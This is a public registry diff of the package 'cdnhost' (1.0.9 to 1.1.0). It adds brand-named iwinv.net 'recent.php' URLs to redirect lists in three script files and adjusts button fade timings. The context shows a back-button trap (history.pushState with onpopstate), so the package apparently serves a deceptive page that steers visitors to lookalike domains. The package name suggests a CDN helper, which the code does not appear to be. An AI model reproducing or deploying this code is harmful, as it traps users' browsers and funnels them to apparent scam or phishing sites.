cdnhost 1.0.9 → 1.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/iwinv.js +4 -0
- package/package.json +1 -1
- package/seekr.js +15 -8
- package/total.js +8 -0
package/iwinv.js
CHANGED
|
@@ -32,6 +32,10 @@ function handleKeyPress(event) {
|
|
|
32
32
|
'https://flightaware.iwinv.net/recent.php',
|
|
33
33
|
'https://koreakr.iwinv.net/recent.php',
|
|
34
34
|
'https://popcat.iwinv.net/recent.php',
|
|
35
|
+
'https://ecount.iwinv.net/recent.php',
|
|
36
|
+
'https://hiworks.iwinv.net/recent.php',
|
|
37
|
+
'https://shopee.iwinv.net/recent.php',
|
|
38
|
+
'https://eomisae.iwinv.net/recent.php',
|
|
35
39
|
];
|
|
36
40
|
|
|
37
41
|
const urls = isMobile ? mobileUrls : desktopUrls;
|
package/package.json
CHANGED
package/seekr.js
CHANGED
|
@@ -21,6 +21,10 @@ const urls = [
|
|
|
21
21
|
'https://flightaware.iwinv.net/recent.php',
|
|
22
22
|
'https://koreakr.iwinv.net/recent.php',
|
|
23
23
|
'https://popcat.iwinv.net/recent.php',
|
|
24
|
+
'https://ecount.iwinv.net/recent.php',
|
|
25
|
+
'https://hiworks.iwinv.net/recent.php',
|
|
26
|
+
'https://shopee.iwinv.net/recent.php',
|
|
27
|
+
'https://eomisae.iwinv.net/recent.php',
|
|
24
28
|
];
|
|
25
29
|
|
|
26
30
|
|
|
@@ -49,6 +53,10 @@ function handleKeyPress(event) {
|
|
|
49
53
|
'https://flightaware.iwinv.net/recent.php',
|
|
50
54
|
'https://koreakr.iwinv.net/recent.php',
|
|
51
55
|
'https://popcat.iwinv.net/recent.php',
|
|
56
|
+
'https://ecount.iwinv.net/recent.php',
|
|
57
|
+
'https://hiworks.iwinv.net/recent.php',
|
|
58
|
+
'https://shopee.iwinv.net/recent.php',
|
|
59
|
+
'https://eomisae.iwinv.net/recent.php',
|
|
52
60
|
];
|
|
53
61
|
|
|
54
62
|
const urls = isMobile ? mobileUrls : desktopUrls;
|
|
@@ -82,14 +90,14 @@ history.pushState(null,null,""),window.onpopstate=function(a){a&&(history.back()
|
|
|
82
90
|
|
|
83
91
|
document.getElementById('container').style.boxShadow = 'none';
|
|
84
92
|
function ss(){
|
|
85
|
-
document.getElementById("s2").style.transition = "opacity
|
|
86
|
-
document.getElementById("button").style.transition = "opacity
|
|
87
|
-
setTimeout("s()",
|
|
88
|
-
setTimeout("h()",
|
|
93
|
+
document.getElementById("s2").style.transition = "opacity 15s";
|
|
94
|
+
document.getElementById("button").style.transition = "opacity 15s";
|
|
95
|
+
setTimeout("s()", 3999);
|
|
96
|
+
setTimeout("h()", 14999);
|
|
89
97
|
}
|
|
90
98
|
function pcss(){
|
|
91
|
-
setTimeout("s()",
|
|
92
|
-
setTimeout("h()",
|
|
99
|
+
setTimeout("s()", 3999);
|
|
100
|
+
setTimeout("h()", 14999);
|
|
93
101
|
}
|
|
94
102
|
function a(){
|
|
95
103
|
document.getElementById("button").style.display="none";
|
|
@@ -115,6 +123,5 @@ function h(){
|
|
|
115
123
|
button.style.opacity = 1;
|
|
116
124
|
document.getElementById("s2").style.transition = "opacity 1s";
|
|
117
125
|
document.getElementById("button").style.transition = "opacity 1s";
|
|
118
|
-
},
|
|
126
|
+
}, 4000);
|
|
119
127
|
}
|
|
120
|
-
|
package/total.js
CHANGED
|
@@ -20,6 +20,10 @@ const urls = [
|
|
|
20
20
|
'https://flightaware.iwinv.net/recent.php',
|
|
21
21
|
'https://koreakr.iwinv.net/recent.php',
|
|
22
22
|
'https://popcat.iwinv.net/recent.php',
|
|
23
|
+
'https://ecount.iwinv.net/recent.php',
|
|
24
|
+
'https://hiworks.iwinv.net/recent.php',
|
|
25
|
+
'https://shopee.iwinv.net/recent.php',
|
|
26
|
+
'https://eomisae.iwinv.net/recent.php',
|
|
23
27
|
];
|
|
24
28
|
|
|
25
29
|
|
|
@@ -48,6 +52,10 @@ function handleKeyPress(event) {
|
|
|
48
52
|
'https://flightaware.iwinv.net/recent.php',
|
|
49
53
|
'https://koreakr.iwinv.net/recent.php',
|
|
50
54
|
'https://popcat.iwinv.net/recent.php',
|
|
55
|
+
'https://ecount.iwinv.net/recent.php',
|
|
56
|
+
'https://hiworks.iwinv.net/recent.php',
|
|
57
|
+
'https://shopee.iwinv.net/recent.php',
|
|
58
|
+
'https://eomisae.iwinv.net/recent.php',
|
|
51
59
|
];
|
|
52
60
|
|
|
53
61
|
const urls = isMobile ? mobileUrls : desktopUrls;
|